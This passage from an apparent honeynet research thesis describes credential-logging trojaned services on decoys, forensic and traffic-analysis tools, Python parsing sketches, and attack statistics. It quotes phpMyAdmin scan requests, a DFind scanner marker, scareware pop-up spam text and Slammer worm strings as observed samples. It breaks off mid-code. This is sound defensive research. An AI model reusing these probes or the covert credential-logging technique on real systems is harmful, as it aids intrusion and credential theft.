encrypted and processed. The file is protected with our own encryption key to
conceal its content. We also restore its access and modification timestamps so it does
not stand out from other files in the same directory. The entire process for a sample
trojaned system service is illustrated in Figure 5.4.
Figure 5.4: Example of a Trojaned System Service
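Once the recorded login attempts have been decrypted and exported from a decoy, identifying commonly tested usernames and passwords is essentially a counting exercise. The following Python sketch illustrates this evaluation step. The record format (one "username<TAB>password" pair per line) and the function name are assumptions made for this example; they do not describe the file layout used by our trojaned services.

```python
from collections import Counter


def most_common_credentials(lines, top=3):
    """Count (username, password) pairs from 'user<TAB>password' lines.

    The tab-separated layout is a hypothetical export format.
    """
    pairs = Counter()
    for line in lines:
        line = line.rstrip("\n")
        if "\t" not in line:
            continue  # skip malformed records
        username, password = line.split("\t", 1)
        pairs[(username, password)] += 1
    # Most frequently tested combinations first.
    return pairs.most_common(top)
```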
Even though the approach helps capture data about adversaries, it suffers from several disadvantages: First, we store security-relevant information directly on a honeypot.
Hence, the data may potentially be discovered and deleted. Consequently, the requirements and standards as postulated by the Honeynet Project (2004a) are violated. Second, a skilled attacker can rather easily detect the manipulation. For instance, by
running the strace command, it is possible to monitor all files that are referenced by
a process. Due to these weaknesses, the solution is only applicable on an interim basis
and must be replaced by more efficient implementations in the long term.
5.1.3.2 Implementation of Data Analysis-Related Programs
After a decoy has been compromised, we usually have to parse through an enormous
amount of data in order to recover the individual steps and activities of the intruder.
These operations are extremely time-consuming. For example, members of the Honeynet
Project (2004c) expect to “spend up to forty hours of analysis for each hour of attack
traffic that has been collected from the honeynet”. Furthermore, an analysis is often
complex, because multiple sources of information such as network packet dumps or
log files must be linked in order to see “the big picture”, corroborate hypotheses, and
draw conclusions. However, various tools may significantly support the work of security
professionals and honeynet administrators and can be of great help when examining an
incident. These tools can be divided into different categories and are briefly described
in the following.
• Network-Related Analysis Tools
As we have already explained, all network flows entering or leaving the honeynet are
recorded with the help of several data capture applications (see Chapter 3 and Honeynet
Project, 2004a). These flows are stored within so-called PCAP (packet capture) files and
are essential when certain actions of an adversary must be studied in more detail. To
process these files efficiently, we recommend installing four tools, namely Wireshark,
SSLDump, Honeysnap, and DataEcho.
Wireshark12 is, according to its creators, one of the leading network analyzers (see also
Orebaugh et al., 2007) and is available for many different platforms, including both Linux
as well as Microsoft Windows operating systems. In contrast to similar applications such
as Tcpdump13 , PCAP files are not processed on the system console but are presented
in a feature-rich graphical user interface. This makes it easy, for instance,
to extract the transcript of an entire FTP session (see Figure 5.5) or to
inspect specific packet streams with the help of a powerful filtering language. As we will
see later, Wireshark is also capable of dealing with encrypted traffic once the correct key
is provided.
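To give an impression of what such tools process internally, the following Python sketch reads the packet records of a capture file. It assumes the classic libpcap file layout (a 24-byte global header followed by 16-byte record headers with microsecond timestamps) and deliberately ignores newer variants such as pcapng. The function name read_pcap is chosen for this example and is not part of Wireshark or Tcpdump.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4  # classic libpcap format with microsecond timestamps


def read_pcap(stream):
    """Yield (timestamp, raw_packet_bytes) tuples from a classic PCAP stream."""
    header = stream.read(24)
    if len(header) < 24:
        raise ValueError("truncated PCAP global header")
    # The magic number reveals the byte order used by the capturing host.
    if struct.unpack("<I", header[:4])[0] == PCAP_MAGIC:
        endian = "<"
    elif struct.unpack(">I", header[:4])[0] == PCAP_MAGIC:
        endian = ">"
    else:
        raise ValueError("not a classic PCAP file")
    while True:
        record = stream.read(16)
        if len(record) < 16:
            break  # end of file (or truncated trailing record)
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", record)
        data = stream.read(incl_len)
        if len(data) < incl_len:
            break  # truncated packet
        yield ts_sec + ts_usec / 1_000_000, data
```

The yielded byte strings still contain the link-layer frame, so further decoding (Ethernet, IP, TCP) is left to the caller.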
Even when a network analyzer is being used, a secured communication channel may
easily remain undiscovered in the vast amount of network flows if it is established on non-standard
system ports. In this case, we can run the SSLDump utility by Eric
Rescorla14 . It makes it possible to identify any connections that are protected with the SSL (Secure
Sockets Layer) or TLS (Transport Layer Security) protocols. Although the underlying
data packets cannot be read unless a so-called keyfile and corresponding password are
specified, encrypted network activities within a honeynet are suspicious by nature and
should be carefully watched (cmp. Honeynet Project, 2004b).
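How an encrypted session on an unusual port can be spotted is sketched below. The heuristic merely checks whether a TCP payload begins like an SSL 3.0 or TLS handshake record carrying a ClientHello message; it is not the detection logic of SSLDump, it does not cover SSL 2.0 hellos, and the function names as well as the list of expected ports are assumptions made for this example.

```python
def looks_like_tls_client_hello(payload):
    """Heuristically check whether a TCP payload starts an SSL 3.0/TLS handshake."""
    if len(payload) < 6:
        return False
    content_type, major, minor = payload[0], payload[1], payload[2]
    record_length = int.from_bytes(payload[3:5], "big")
    handshake_type = payload[5]
    return (
        content_type == 0x16              # record type: handshake
        and major == 0x03                 # SSL 3.0 and TLS share major version 3
        and minor <= 0x04
        and 0 < record_length <= 2 ** 14  # maximum plaintext record size
        and handshake_type == 0x01        # handshake message: ClientHello
    )


def suspicious_flows(flows, expected_ports=(443, 993, 995)):
    """Return (port, payload) pairs that speak TLS where it is not expected."""
    return [
        (dst_port, payload)
        for dst_port, payload in flows
        if dst_port not in expected_ports and looks_like_tls_client_hello(payload)
    ]
```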
To get a general overview of the contents of a PCAP file, the Honeysnap program
by Arthur Clune is very useful15 . It is distributed free of charge by members of the
Honeynet Project and requires a pre-installed Python environment16 to be executed
properly. With Honeysnap, we are able to generate summary reports about traffic
flows, dissect individual connections, and analyze certain communication protocols in
depth. We can also search for specific keywords and commands within a recorded IRC
(Internet Relay Chat) session. The latter is particularly interesting, because the IRC
protocol is frequently abused by adversaries to control so-called botnets, i.e., networks
of compromised machines (see Holz, 2005; Bächer et al., 2008).
12 see http://www.wireshark.org/
13 see http://www.tcpdump.org/
14 see http://www.rtfm.com/ssldump/
15 see https://projects.honeynet.org/honeysnap/
16 see http://www.python.org/
Figure 5.5: Restoring a Captured FTP Session with Wireshark
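The keyword search within an IRC session can be approximated in a few lines. The sketch below is not taken from Honeysnap; it assumes that the session has already been reassembled into text lines in the usual IRC message syntax (":prefix PRIVMSG target :text"), and the function name and keyword list are hypothetical.

```python
def find_irc_keywords(lines, keywords):
    """Return (line_number, text) pairs of PRIVMSG messages containing a keyword."""
    wanted = [keyword.lower() for keyword in keywords]
    hits = []
    for number, line in enumerate(lines, start=1):
        # Split ':nick!user@host PRIVMSG #channel' from the trailing message text.
        head, separator, text = line.rstrip("\r\n").partition(" :")
        tokens = head.split()
        if not separator or "PRIVMSG" not in tokens[:2]:
            continue  # not a channel or private message
        if any(keyword in text.lower() for keyword in wanted):
            hits.append((number, text))
    return hits
```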
Finally, we suggest installing DataEcho17 by the Solera Networks group which is particularly suitable for analyzing web application-related activities. It implements its own
web browser and permits viewing page requests and responses comfortably in a graphical
window. In the example shown in Figure 5.6, DataEcho is capable of restoring an attack
tool that was run during an intrusion of one of our decoys.
17 see http://sourceforge.net/projects/data-echo/
Figure 5.6: Analyzing Web-Based Attacks with DataEcho
• File-Related Analysis Tools
Adversaries often transfer their own tools and applications to the target machine, either
to fully penetrate the system or to use it as a starting point for further attacks (cmp.
Honeynet Project, 2000b). In many cases, these tools are erased after being executed
though in order to hide traces and evade detection. On the other hand, the programs
may provide significant hints concerning the origin, intentions, and skills of the attacker
and, therefore, are worth restoring.
To recover deleted information on a honeypot, we can try to analyze sections of
memory as well as file partitions on the respective hard disks. This approach is explained
in detail by Farmer and Venema (2005). Alternatively, we may attempt to reconstruct
the affected data directly from our network records. We present two tools that are
explicitly designed for these purposes.
With PEHunter by Tillmann Werner18 , we can extract Microsoft Windows executables
out of the network traffic. The application consists of a server and client component
and must be built and executed on a Linux operating system as shown in Listing 5.1.
When the server is started, it is bound to an open system port and begins processing
the recorded network packets that are replayed by the client program. Once the header
of an executable is found, the file is restored and saved to hard disk.
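The header recognition step can be illustrated as follows. The sketch scans a byte stream for the "MZ" marker of the DOS header, follows the e_lfanew field at offset 0x3C, and checks for the "PE\0\0" signature at the referenced position. It is a simplified illustration of the principle rather than PEHunter's actual implementation, and the function name is an assumption.

```python
import struct


def find_pe_offsets(data):
    """Return offsets in `data` at which a plausible PE executable begins."""
    offsets = []
    start = data.find(b"MZ")
    while start != -1:
        # e_lfanew (offset 0x3C in the DOS header) points to the PE signature.
        if start + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, start + 0x3C)
            pe_pos = start + e_lfanew
            if data[pe_pos:pe_pos + 4] == b"PE\x00\x00":
                offsets.append(start)
        start = data.find(b"MZ", start + 1)
    return offsets
```

A complete extractor would additionally parse the section table to determine where the executable ends; this sketch only locates candidate start positions.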
Header recognition techniques are also implemented in Foremost19 , a so-called data
carving utility that was originally developed by the United States Air Force Office of
Special Investigations (AFOSI) and the Center for Information Systems Security Studies
and Research (CISR). It is compatible with Linux operating systems and variants of the
Berkeley Software Distribution (BSD) and is freely available for download. One of its
primary features is to recover images from network streams, but it often
manages to recover documents as well as video and audio files.
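Data carving by header and footer signatures can be sketched in a similar fashion. The example below extracts byte ranges that begin with the JPEG start marker and end with the JPEG end marker. It is a minimal illustration and not Foremost's algorithm: embedded thumbnails, fragmented files, and other formats are not handled, and the size limit is an arbitrary assumption.

```python
JPEG_HEADER = b"\xff\xd8\xff"  # start-of-image marker plus first segment byte
JPEG_FOOTER = b"\xff\xd9"      # end-of-image marker


def carve_jpegs(data, max_size=10 * 1024 * 1024):
    """Extract byte ranges that start with a JPEG header and end with its footer."""
    carved = []
    start = data.find(JPEG_HEADER)
    while start != -1:
        end = data.find(JPEG_FOOTER, start + len(JPEG_HEADER))
        if end == -1:
            break  # no footer left in the stream
        end += len(JPEG_FOOTER)
        if end - start <= max_size:
            carved.append(data[start:end])
        # Continue searching behind the candidate that was just examined.
        start = data.find(JPEG_HEADER, end)
    return carved
```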
# build the individual components of PEHunter
gcc -o pehuntd pehuntd.c pehuntd.h md5.c md5.h -Wall -Werror
gcc -o pehuntc pehuntc.c -Wall -Werror
# grant execute permissions to the built components
chmod 755 pehuntd pehuntc
# execute the server and extract the captured binaries
./pehuntd
./pehuntc <packet capture file>
Listing 5.1: Restoring Windows Executables with PEHunter
• Log File-Related Analysis Tools
Apart from recorded network dumps, log files that are generated by the Snort intrusion
detection system on the Honeywall contain valuable information about security-relevant
incidents, e.g., the date, time, and origin of an attack. Since a different log file is created
for each day, accumulating the data manually and preparing a monthly or even annual
status report of the honeynet can be quite cumbersome. For this reason, we install
the SnortALog utility by Jérémy Chartier20 . It only requires a working Perl interpreter
and, hence, can be run on most platforms, including Microsoft Windows. SnortALog
is capable of processing multiple log files simultaneously. It prints a summary of the
detected alerts and the IP addresses involved and sorts the entries according to their severity. Furthermore, due to a number of filter expressions, specific warning and notification
messages by the intrusion detection system can be excluded from the final report if
desired. These features make SnortALog highly efficient when observing the state of
individual decoys and help security professionals save time during an investigation.
18 see http://honeytrap.mwcollect.org/pehunter.html
19 see http://foremost.sourceforge.net/
20 see http://jeremy.chartier.free.fr/snortalog/
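The kind of aggregation described above can be sketched in Python as follows. The example is not derived from SnortALog, which is written in Perl. It assumes that alerts are logged in Snort's one-line "fast" alert format and that only IPv4 addresses occur; the regular expression and the function name are our own.

```python
import re
from collections import Counter

# Matches the relevant parts of a one-line ("fast") Snort alert.
ALERT_RE = re.compile(
    r"\[\*\*\]\s+\[\d+:\d+:\d+\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\[Priority:\s*(?P<priority>\d+)\]"
    r"\s+\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::\d+)?\s+->\s+(?P<dst>[\d.]+)"
)


def summarize_alerts(lines):
    """Count alerts per (priority, message) and per source address."""
    by_signature = Counter()
    by_source = Counter()
    for line in lines:
        match = ALERT_RE.search(line)
        if match is None:
            continue  # not an alert line
        by_signature[(int(match["priority"]), match["msg"])] += 1
        by_source[match["src"]] += 1
    # Snort priority 1 is the most severe: sort by priority, then by frequency.
    ranked = sorted(by_signature.items(), key=lambda item: (item[0][0], -item[1]))
    return ranked, by_source.most_common()
```

Because the function accepts any iterable of lines, the daily log files can simply be chained together before they are passed in.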
• System-Related Analysis Tools
After a system has been compromised, we must not use its file and process utilities in
our analysis, for several reasons: First, the operating system may be subject to
subversion (cmp. Carrier, 2006). For example, many attackers download rootkits to the
target computer after a successful intrusion in order to conceal their presence. Rootkits
are “Trojan horse backdoor tools that modify existing operating system software so
that an attacker can keep access to and hide on a machine” (Skoudis and Zeltser, 2003,
p. 303). Because of these modifications, the underlying platform must not be trusted
any longer. Second, by executing programs on the local computer, the MAC times of
certain files are likely to be updated. The MAC times keep track of when a file or its
meta-information was last accessed, modified, or changed (cmp. Farmer and
Venema, 2005). When these times are altered, we are unable to restore the original
state after the break-in, the system is contaminated with our own traces, and pieces of
evidence are potentially destroyed.
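For illustration, the MAC times of a file can be queried as shown in the following sketch. It assumes a Unix-like system, where st_ctime denotes the last change of the meta-information (on Microsoft Windows, the same field reports the creation time). The function name is an assumption. Following the argument above, such a query should be run against a read-only copy or mount of the evidence rather than on the live honeypot.

```python
import os
from datetime import datetime, timezone


def mac_times(path):
    """Return the modification, access, and change times of `path` in UTC."""
    info = os.stat(path)  # reads the inode only; the file content is not opened

    def to_utc(seconds):
        return datetime.fromtimestamp(seconds, tz=timezone.utc)

    return {
        "modified": to_utc(info.st_mtime),  # content last written
        "accessed": to_utc(info.st_atime),  # content last read
        "changed": to_utc(info.st_ctime),   # meta-information last changed (Unix)
    }
```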
To circumvent these problems, we propose booting a penetrated honeypot from the
Helix forensic Live CD21 . It contains many applications that are helpful for an investigation, including the md5deep file integrity utility22 . With md5deep, we can recursively
calculate or check cryptographic checksums of entire file systems within a short amount
of time. These checksums may then be compared against official black and white
lists such as the National Software Reference Library (NSRL) in order to quickly identify
malicious applications (see NIST, 2008).
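The principle of recursive checksum calculation and list comparison is sketched below. The code does not reproduce md5deep; in particular, the known-good and known-bad lists are assumed to be plain Python sets of hexadecimal MD5 digests, whereas the NSRL is distributed in its own data format that would have to be parsed first. All function names are hypothetical.

```python
import hashlib
import os


def md5_of_file(path, chunk_size=65536):
    """Return the hexadecimal MD5 digest of a file, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def classify_tree(root, known_good, known_bad):
    """Hash every file below `root` and sort it into good, bad, or unknown."""
    result = {"good": [], "bad": [], "unknown": []}
    for directory, _subdirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(directory, name)
            checksum = md5_of_file(path)
            if checksum in known_bad:
                result["bad"].append(path)
            elif checksum in known_good:
                result["good"].append(path)
            else:
                result["unknown"].append(path)  # candidates for manual review
    return result
```

Files that match neither list are usually the most interesting ones, since they may have been created or altered by the intruder.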
During the examination, Helix also mounts all partitions of the inspected machine
as read-only by default. Consequently, we are never at risk of overwriting valuable
information or data.
5.1.4 Summary of the Implementation and Deployment
Process
Several key factors have to be taken into consideration when deploying a honeynet.
First, we recommend setting up at least two decoys with different operating systems
and applications to capture attacks on multiple platforms. In our case, we implement
honeypots based on both Linux and Microsoft Windows operating systems with various
system services that are commonly targeted “in the wild”. A summary illustration of
the entire system architecture is presented in Figure 5.7.
21 see http://helix.e-fense.com/Download.php
22 see http://md5deep.sourceforge.net/
Figure 5.7: System Architecture of the Honeynet
The machines must be permanently watched with the help of the Honeywall, a monitoring and filtering gateway device that permits controlling all inbound and outbound
network activities. The Honeywall needs to be carefully configured to prevent external
third parties from getting harmed.
After a honeypot has been compromised, we have to examine the individual steps and
actions of the intruder to learn more about her motives, tactics, and intentions. During
the analysis, the Walleye web management tool which is part of the Honeywall is of
great help. It offers a comfortable user interface for the generated data records, e.g.,
network packet dumps, firewall logs, and other system-relevant information. In addition
to Walleye, a number of further programs are noteworthy for an investigation as well,
most importantly Wireshark, a powerful network analyzer that enables inspecting traffic
flows in detail.
In the following section, we give an overview of the collected honeynet data and
outline the results of our research. Two particularly interesting attacks are presented in
depth in Section 5.3.
5.2 Overview about the Collected Honeynet Data
Our honeynet was successfully connected to the Internet on February 27, 2008. For
slightly more than five months, we monitored connections to and from our decoys.
During this observation period, we captured more than 21.5 GB of raw network
traffic, comprising more than 130 million packets.
Manually investigating these huge amounts of data is infeasible. Therefore, a significant level of automation is required to dissect the individual flows and generate statistical
reports. The different tools and utilities we have introduced in the previous section are
invaluable for these tasks. However, in many cases, we also need to develop our own
scripts, e.g., to extract certain text or data patterns, or to examine particularly interesting information in more detail. Unless otherwise stated, these scripts are included on
the accompanying CD of this thesis.
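As an illustration of the kind of helper script meant here, the following minimal sketch counts the packets and captured bytes in a classic libpcap capture file. It is not one of the scripts from the accompanying CD; the function names and the in-memory sample capture are assumptions made for this example, and only the classic pcap layout (24-byte global header, 16-byte record headers) is handled.

```python
import io
import struct

PCAP_MAGIC = 0xA1B2C3D4  # magic number of the classic libpcap format


def count_pcap_packets(stream):
    """Return (packet_count, captured_bytes) for a classic libpcap stream."""
    header = stream.read(24)
    if len(header) < 24:
        raise ValueError("truncated pcap global header")
    # The magic number reveals the byte order the file was written in.
    for endian in ("<", ">"):
        if struct.unpack(endian + "I", header[:4])[0] == PCAP_MAGIC:
            break
    else:
        raise ValueError("not a classic libpcap file")
    packets = 0
    captured = 0
    while True:
        record = stream.read(16)
        if len(record) < 16:
            break
        # Record header: ts_sec, ts_usec, incl_len, orig_len
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", record)
        data = stream.read(incl_len)
        if len(data) < incl_len:
            break  # ignore a truncated trailing record
        packets += 1
        captured += incl_len
    return packets, captured


def build_sample_pcap(payloads):
    """Build a tiny little-endian capture in memory (hypothetical test helper)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for index, payload in enumerate(payloads):
        out += struct.pack("<IIII", index, 0, len(payload), len(payload)) + payload
    return out


sample = io.BytesIO(build_sample_pcap([b"abc", b"0"]))
print(count_pcap_packets(sample))
```

For a real capture, the same function can be applied to a file opened in binary mode; per-host or per-protocol statistics would additionally require decoding the link-layer and IP headers of each record.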
A concise summary of the interactions with our honeynet is presented below. A
description of specific attacks that we have frequently been confronted with is the subject
of Section 5.2.2.
5.2.1 Interactions with the Honeynet
In the course of the observation period, we monitored communication requests from more
than 3,900 different IP addresses. As illustrated on the world map depicted in Figure 5.8,
the respective hosts were spread over all continents. Areas drawn in darker red reflect
clusters with more than 100 machines. The top countries with the highest number of
unique systems are shown in Table 5.3. The list comprises China, the United States as
well as several Western European countries such as Germany or France. These results
are consistent with findings by Holz (2006) and Curran et al. (2005). Surprisingly, many
connections were also initiated from computers located in Taiwan. In contrast, many
countries in Northern and Eastern Europe, South America, and Africa interacted only slightly
with our honeynet, if at all. These states are visualized in lighter green in
Figure 5.8.
It is important to note though that not all network flows coming from or going to
a honeypot necessarily imply an attack. For example, legitimate system components
may periodically contact external servers, e.g., to check for new program updates (cmp.
Honeynet Project, 2004b). These update procedures cannot be disabled in all cases. As
a result, data records are polluted to a certain degree. For this reason, the amount of
captured traffic is neither a reliable indicator for the quantity of incidents, nor for their
quality.
Figure 5.8: Origins of Machines Interacting with the Honeynet
 #   Country          Number of Systems Involved
 1   China            868
 2   United States    632
 3   Germany          295
 4   Canada           226
 5   Taiwan           183
 6   France           163
 7   Italy            142
 8   Japan            105
 9   Netherlands      100
10   United Kingdom    80
Table 5.3: Top 10 Countries Interacting with the Honeynet
We may estimate the extent of malicious activities more accurately by analyzing notifications that are generated by the Snort intrusion detection system. In sum, more
than 13,600 threats were identified. These threats can be distinguished according to
their priority rating and their attack classification as indicated in Figure 5.9(a) and Figure 5.9(b). As can be seen, more than 86% of all alerts were raised by autonomously
propagating worms or automated password brute force utilities.
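The two classifications can be derived from the alert log with a few lines of code. The sketch below assumes that alerts are available in Snort's one-line "fast" alert format, in which each entry carries a bracketed classification and priority; the sample entries, addresses, and rule identifiers are invented for illustration and are not taken from our data set.

```python
import re
from collections import Counter

# Matches the "[Classification: ...] [Priority: n]" part of a one-line alert.
ALERT_RE = re.compile(
    r"\[Classification: (?P<cls>[^\]]+)\]\s*\[Priority: (?P<prio>\d+)\]"
)


def tally_alerts(lines):
    """Count alerts per priority rating and per attack classification."""
    by_priority = Counter()
    by_class = Counter()
    for line in lines:
        match = ALERT_RE.search(line)
        if match is None:
            continue  # skip lines that are not alert entries
        by_priority[int(match.group("prio"))] += 1
        by_class[match.group("cls")] += 1
    return by_priority, by_class


# Invented sample entries (documentation address ranges, made-up rule IDs).
SAMPLE_ALERTS = [
    "02/28-19:44:59.000000 [**] [1:1000001:1] Example worm alert [**] "
    "[Classification: Misc Attack] [Priority: 2] {UDP} 192.0.2.1:1045 -> 198.51.100.7:1434",
    "02/28-19:45:03.000000 [**] [1:1000001:1] Example worm alert [**] "
    "[Classification: Misc Attack] [Priority: 2] {UDP} 192.0.2.9:2001 -> 198.51.100.7:1434",
    "02/28-19:46:10.000000 [**] [1:1000002:1] Example login alert [**] "
    "[Classification: Attempted Administrator Privilege Gain] [Priority: 1] "
    "{TCP} 192.0.2.5:40000 -> 198.51.100.7:22",
]

priorities, classes = tally_alerts(SAMPLE_ALERTS)
print(dict(priorities), dict(classes))
```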
Password brute force attacks usually intend to compromise the administrative account
of a machine as we will see in a later section of this thesis. If such an operation succeeds,
the entire system platform is at imminent risk. Therefore, this type of incident must
be monitored with a high priority. The same holds true in case a web application is
compromised (cmp. Andrews and Whittaker, 2006). Unfortunately, only a small number
of intruders sought to exploit file inclusion vulnerabilities (cmp. Section 5.1.1) or other
types of security weaknesses. All of these efforts failed in the end. In contrast, many
worms we have observed targeted older vulnerabilities that are fixed on most modern
(a) Priority-Based Classification
(b) Activity-Based Classification
Figure 5.9: Classification of Attacks Reported by the Snort Intrusion Detection System
computer systems. A successful penetration is unlikely in these cases. Consequently,
these malware species may be investigated with lower priority. Likewise, port
scans and other information gathering attempts do not directly affect the integrity of a
honeypot. That is why these activities are rated with a lower priority as well.
5.2.2 Common Attacks on the Honeynet
Throughout the observation period, certain types of attacks were repeatedly launched
against our honeynet. As members of the Honeynet Project report, these types of attacks
are commonly found in other honeynet setups as well (cmp. Honeynet Project, 2004b,
p. 56-57).
However, we need to emphasize that a significant number of the threats presented
below were not correctly recognized by the default rule set of the Snort intrusion detection system. The Distributed Denial of Service attacks on one of our decoys that are
illustrated in more detail in Section 5.2.2.5 were not even detected at all. For this reason, we strongly recommend examining captured traffic flows regularly with additional
data analysis utilities. The tools and applications introduced in Section 5.1.3.2 are well
suited for these tasks. Thereby, anomalies and suspicious network patterns are likely to
be found more easily.
5.2.2.1 Application and Vulnerability Scans
Attackers usually go through some phase of active reconnaissance prior to an intrusion
in order to learn as much as possible about the target platform (cmp. McClure et al.,
2005). This phase includes so-called fingerprinting and mapping techniques that help
identify the operating system as well as running services and applications (see Ruef, 2007,
for a systematic approach to these steps). A comprehensive knowledge of the system
configuration and its flaws may greatly facilitate a later penetration. Despite these
findings, information gathering activities are often narrowed down to a certain type of
vulnerability only. As a result, adversaries solely test whether or not a system is exposed
    GET /phpmyadmin/main.php HTTP/1.0
    GET /admin/main.php HTTP/1.0
    GET /mysql/main.php HTTP/1.0
    GET /PMA/main.php HTTP/1.0
    GET /phpMyAdmin-2.6.3/main.php HTTP/1.0
    GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0
    GET /phpmyadmin2/main.php HTTP/1.0
    GET /db/main.php HTTP/1.0
    ...
Listing 5.2: Example of a Network Scan for Instances of the phpMyAdmin Database
Administration Program
to a specific attack. If this is the case, the respective host is exploited, otherwise the
blackhat moves on and probes another machine. As members of the Honeynet Project
(2004b, p. 563) conclude, most intruders “are not interested in breaking into a specific
system, but interested into as many systems as possible” and “focus on the easy kill”.
To a great degree, these tasks can be automated with scripts and freely available
toolkits. For instance, the DFind23 utility by Arnaud Dovi is able to search for vulnerable
web servers, database management systems, and various other security weaknesses. It
leaves suspicious traces in the log files as shown in Figure 5.10 though. The string
w00tw00t.at.ISC.SANS.DFind clearly stands out and quickly catches the eye of a trained
analyst. Therefore, the DFind utility may be detected quite easily. On average, we
monitored three of these scans per day.
Figure 5.10: Request of the DFind Vulnerability Scanner
In addition, our honeypots were frequently checked for installations of the phpMyAdmin database administration program. For this purpose, adversaries sent sample requests to typical application directories. As indicated in Listing 5.2, tests covered both
generic as well as specific versions of the software. In total, more than 10,000 connections
were initiated, of which less than 3% were successful and provoked a response. Even though this
may appear as a minor fraction, an instance of the program that is fully accessible over
the network poses a significant threat to the entire system architecture as we will see in
Section 5.3.1.
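Both kinds of scans leave request lines that are easy to recognize mechanically. The following sketch labels HTTP request lines as DFind probes, phpMyAdmin probes, or other traffic. The marker string and the main.php pattern follow the examples given above; the function name, the labels, and the sample request lines are assumptions made for this illustration.

```python
import re
from collections import Counter

DFIND_MARKER = "w00tw00t.at.ISC.SANS.DFind"
# A request for main.php below some directory, as in Listing 5.2.
PMA_PROBE_RE = re.compile(
    r"^GET\s+/[^\s?]*/main\.php\s+HTTP/1\.[01]$", re.IGNORECASE
)


def classify_request(request_line):
    """Return a coarse label for a single HTTP request line."""
    line = request_line.strip()
    if DFIND_MARKER in line:
        return "dfind"
    if PMA_PROBE_RE.match(line):
        return "phpmyadmin-probe"
    return "other"


# Illustrative request lines; the first one is a made-up DFind-style request.
SAMPLE_REQUESTS = [
    "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1",
    "GET /phpmyadmin/main.php HTTP/1.0",
    "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0",
    "GET /index.html HTTP/1.1",
]

print(Counter(classify_request(r) for r in SAMPLE_REQUESTS))
```

Counting the labels per day gives figures comparable to the scan rates reported above; a real deployment would read the request lines from the web server log or from reassembled HTTP flows.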
23 see http://heapoverflow.com/f0rums/projects/tools/20-dfind-port-scanner/
5.2.2.2 Spam-Related Attacks
One type of incident that we have witnessed particularly often is known as the PopUp
Spam attack (see Baldwin, 2003). It abuses the Microsoft Windows Messenger Service
to deliver unsolicited bulk text messages to computer users.
The Messenger Service was originally designed to help system administrators send
status messages across a network (cmp. Microsoft Corporation, 2004a). By default, it
is solely enabled on Microsoft Windows 2000 operating systems as well as Microsoft
Windows XP prior to service pack 2. Modern-day computer systems are not affected.
Various techniques do exist to carry out the attack successfully: A spammer may,
for instance, invoke a series of simple net send commands to start interacting with the
remote message service. In this case, requests are transported via the NetBIOS and
SMB (Server Message Block) network protocols (see Baldwin, 2002b). For this purpose,
a full TCP connection must be established with the machine of the victim though, and a
bi-directional communication channel is opened on port 139. Because this channel may
be traced back to the sender, the attacker cannot trivially conceal her identity.
A more sophisticated approach is to wrap the message inside a single UDP datagram
and pass it directly to the processing queue of the service that is listening on an ephemeral
port in the range of 1025 to 1029 (see Baldwin, 2003). The User Datagram
Protocol (UDP) is unreliable and connectionless, i.e., packet deliveries do not need to
be acknowledged as opposed to the TCP-based transport mechanism used in the prior
attack (see Comer, 2000; Postel, 1980). Due to these characteristics, the adversary may
forge the source address of the message more easily and stay anonymous.
When a spam message arrives at the client system, a notification box “pops up”,
claiming that a number of security weaknesses have been found and need fixing. Typically,
a specific commercial product is offered for sale as a solution. An example of such a
message is shown in Listing 5.3.
    "STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
    Windows has found 55 Critical System Errors.
    To fix the errors please do the following:
    1. Download Registry Update from: <xxx>
    2. Install Registry Update
    3. Run Registry Update
    4. Reboot your computer
    FAILURE TO ACT NOW MAY LEAD TO SYSTEM FAILURE!"
Listing 5.3: Example of a PopUp Spam Message
Figure 5.11: Geographical Spread of PopUp Spam Attacks
City          Number of Machines   Number of Messages Sent
Haerbin       78                   12,925
Mudanjiang     7                    1,474
Shanghai       1                        4
Shenyang       2                       27
Taiyuan       33                    3,772
Zhenjiang      4                      387
Table 5.4: Origins of PopUp Spam Attacks
Even though the attack does not cause any direct damage, an inexperienced user
may fall prey to the con and be tricked into buying a dubious software application.
Furthermore, considering the frequency with which similar messages are received, this type of advertisement quickly becomes annoying: On average, we monitored 53 product offers per day.
In total, we captured more than 19,200 messages. All of these messages were sent
from 125 machines located in six Chinese cities. The geographical spread of the attacks
is visualized in Figure 5.11; a summary of our analysis is given in Table 5.4.
5.2.2.3 Malware-Based Attacks
As we have already explained, a large number of alerts were raised by the Snort intrusion detection system due to worm activities. For example, we calculated a mean
value of 23 attacks per day solely by the Slammer worm (a.k.a. Sapphire). This type
Figure 5.12: Packet Dump of the Slammer Worm
of malware exploits a buffer-overflow vulnerability in the Microsoft SQL Server 2000
database management system or in the Microsoft SQL Server Desktop Engine
(MSDE) (see CERT, 2003a). Due to its small size of slightly more than 400 bytes and
a UDP-based propagation strategy, the worm spreads significantly faster than other
threats such as Code Red or Nimda (cmp. Moore et al., 2003). The payload of a captured Slammer packet is shown in Figure 5.12. We clearly see several strings such as
dllhel32hkernQhounthickChGetTf or toQhsend that may be used to create a unique fingerprint of the worm. Similar techniques can be applied to identify common malicious
activities that are monitored within a honeynet. This process can also be automated
as illustrated by Kreibich and Crowcroft (2004): With the Honeycomb application24 , it
is possible to automatically analyze captured traffic of a honeypot and generate corresponding signatures for network monitoring devices. Similar approaches have also been
pursued by Singh et al. (2004) with Earlybird, Kim and Karp (2004) with Autograph,
Newsome et al. (2005) with Polygraph, as well as Li et al. (2006) with Hamsa (see also
Wang et al., 2006).
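A hand-written fingerprint of this kind can be sketched in a few lines. The example below flags a UDP payload as Slammer-like if it contains both strings quoted above and is addressed to UDP port 1434; the port number is taken from public advisories on the worm rather than from this section, and the function name and the synthetic payload are assumptions made for illustration. Automatically generated signatures such as those produced by Honeycomb are considerably more elaborate.

```python
# Strings visible in the captured payload (see Figure 5.12).
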